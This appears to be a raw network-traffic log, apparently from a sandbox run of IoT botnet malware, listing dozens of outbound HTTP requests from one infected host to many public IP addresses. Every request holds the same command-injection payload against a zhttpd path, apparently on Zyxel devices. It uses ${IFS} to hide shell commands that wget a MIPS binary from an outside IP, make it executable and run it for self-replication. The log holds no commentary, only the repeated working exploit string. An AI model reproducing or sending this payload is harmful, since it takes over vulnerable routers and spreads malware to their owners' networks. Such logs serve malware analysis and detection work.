                                                Jan 12, 2024 18:24:21.491633892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                707192.168.2.133430618.213.169.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491667986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                708192.168.2.135127046.34.99.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491698027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                709192.168.2.1360708164.205.66.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491729021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                710192.168.2.135127242.185.207.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491771936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                711192.168.2.1346812167.163.133.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491836071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                712192.168.2.1341422184.178.76.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491867065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                713192.168.2.1345350192.85.112.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491899014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                714192.168.2.1350236177.230.36.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491939068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                715192.168.2.134238090.98.53.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.491991997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                716192.168.2.133546269.130.47.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492026091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                717192.168.2.135436882.23.20.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492069960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                718192.168.2.135289654.210.252.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492150068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                719192.168.2.1354716218.59.122.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492182016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                720192.168.2.133699025.175.140.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492225885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                721192.168.2.1336506106.191.63.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492278099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                722192.168.2.1339806197.203.229.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492338896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                723192.168.2.1335130118.174.6.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492396116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                724192.168.2.1345546175.40.171.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492458105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                725192.168.2.135519057.83.66.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492522955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                726192.168.2.1333540167.68.146.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492563963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                727192.168.2.1344856104.222.247.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492623091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                728192.168.2.135817874.37.238.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492686987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                729192.168.2.1332956209.117.4.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492727041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                730192.168.2.1354634128.190.245.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492764950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                731192.168.2.1355172111.62.20.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492801905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                732192.168.2.1348124119.62.13.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492866039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                733192.168.2.1336430123.104.122.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492897987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                734192.168.2.1333074195.0.181.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492939949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                735192.168.2.1357260160.173.72.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.492990971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                736192.168.2.1349460122.91.188.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493037939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                737192.168.2.133340846.177.123.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493088961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                738192.168.2.1343208144.139.61.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493150949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                739192.168.2.1339312121.221.56.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493204117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                740192.168.2.133296061.29.189.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493310928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                741192.168.2.1342900107.158.22.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493359089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                742192.168.2.133801460.124.80.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493360043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                743192.168.2.1348240219.224.84.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493422985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                744192.168.2.1350154109.29.151.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493498087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                745192.168.2.133390250.56.201.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493527889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                746192.168.2.1352856118.138.190.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493583918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                747192.168.2.134896894.222.241.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493650913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                748192.168.2.134089254.51.247.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493702888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                749192.168.2.133589247.160.220.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493738890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                750192.168.2.135069438.95.29.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493788958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                751192.168.2.1341406121.73.76.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493833065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                752192.168.2.134151238.239.179.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493904114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                753192.168.2.1354986184.237.129.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.493952990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                754192.168.2.1338078164.244.136.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494000912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                755192.168.2.135090836.78.116.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494050026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                756192.168.2.134777663.172.143.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494102001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                757192.168.2.1344610197.166.3.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494148970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                758192.168.2.1333910175.64.214.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494204998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                759192.168.2.134432296.8.225.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494242907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                760192.168.2.135999881.111.33.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494334936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                761192.168.2.1359600166.177.28.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494386911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                762192.168.2.1342328143.128.147.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494446039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                763192.168.2.134688281.121.169.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494497061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                764192.168.2.13455928.50.238.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494544983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                765192.168.2.135783813.146.164.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494609118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                766192.168.2.1350814107.204.32.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494673014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                767192.168.2.1354522130.236.218.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494756937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                768192.168.2.134533694.59.9.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:21.494812012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                769192.168.2.1354154220.68.190.174443
                                                TimestampBytes transferredDirectionData
